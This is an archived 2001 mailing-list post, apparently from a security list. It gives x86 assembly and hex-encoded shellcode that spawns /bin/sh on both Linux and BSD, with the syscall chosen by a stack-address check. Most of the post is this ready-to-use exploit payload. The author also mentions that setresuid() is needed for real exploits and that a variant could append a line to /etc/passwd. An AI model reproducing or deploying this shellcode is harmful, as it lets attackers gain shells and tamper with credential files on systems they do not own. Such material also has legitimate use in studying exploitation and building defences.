The following asm was used to create the shellcode that follows it. The shellcode works on both Linux and *BSD on x86 arch(tested on slackware and freeBSD). The shellcode executes /bin/sh and does not do setresuid() which would be necesarry for an exploit(can be done the same way I do execve(), yes the code is ugly and not optimized but it does work). Thanks to zen-parse and corecode for the help. .text .global main main: jmp bottom top: popl %ebx xorl %edx, %edx movl %ebx,0x8(%edi) movl %edx,0xc(%edi) leal 0x8(%edi),%ecx leal 0xc(%esi),%edx pushl %edx #envp pushl %ecx #argv pushl %ebx #string movl $0xbfff0101, %esi cmp %esi, %esp jg linux jmp bsd exit: add $12, %esp movl $0x11111112,%eax xorl $0x11111113,%eax #syscall 1, exit pushl %eax int $0x80 linux: movl $0x1111113b, %eax xorl $0x11111130, %eax #sycall 11 on linux, execve int $0x80 jmp exit bsd: movl $0x11111130, %eax xorl $0x1111110b, %eax #sycall 59 on BSD, execve pushl %eax int $0x80 jmp exit bottom: call top .string "/bin/sh\0" "\xeb\x4a\x5b\x31\xd2\x89\x5f\x08\x89\x57\x0c\x8d\x4f\x08\x8d\x56" "\x0c\x52\x51\x53\xbe\x01\x01\xff\xbf\x39\xf4\x7f\x12\xeb\x1e\x83" "\xc4\x0c\xb8\x12\x11\x11\x11\x35\x13\x11\x11\x11\x50\xcd\x80\xb8" "\x3b\x11\x11\x11\x35\x30\x11\x11\x11\xcd\x80\xeb\xe2\xb8\x30\x11" "\x11\x11\x35\x0b\x11\x11\x11\x50\xcd\x80\xeb\xd3\xe8\xb1\xff\xff" "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x00\x90\x90" Doing something where the system calls are the same is a little bit easier because you don't have to test wether it is BSD or Linux. I have example shellcode of this that writes hello world on my site, www.lockeddown.net/dual.asm. write, open, close are sys calls 4, 5, 6 respectively on both linux and BSD, so writing shellcode to add a line to /etc/passwd would be pretty easy and fairly small. lockdown
This archive was generated by hypermail 2b30 : Thu Jul 26 2001 - 15:39:25 PDT